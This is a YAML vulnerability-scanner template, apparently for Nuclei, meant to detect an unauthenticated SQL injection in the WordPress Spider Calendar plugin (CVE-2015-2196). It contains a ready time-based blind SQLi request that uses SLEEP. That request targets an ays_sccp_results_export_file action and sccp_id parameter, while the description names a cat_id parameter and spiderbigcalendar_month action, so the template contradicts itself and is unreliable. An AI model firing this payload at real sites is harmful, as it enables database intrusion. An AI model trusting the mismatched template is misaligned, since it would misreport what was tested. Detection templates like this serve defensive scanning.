41 lines
1.5 KiB
YAML
41 lines
1.5 KiB
YAML
id: CVE-2015-2196
|
|
|
|
info:
|
|
name: WordPress Spider Calendar <=1.4.9 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad
|
|
- https://wordpress.org/plugins/spider-event-calendar/
|
|
- http://www.exploit-db.com/exploits/36061
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-2196
|
|
remediation: Fixed in version 1.4.14.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2015-2196
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
tags: wordpress,wp,sqli,cve2015,wpscan,wp-plugin,spider-event-calendar,unauth,edb,cve
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout 10s
|
|
GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration_1>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(body, "{\"status\":true,\"data\"")'
|
|
condition: and
|
|
|
|
# Enhanced by md on 2023/04/12
|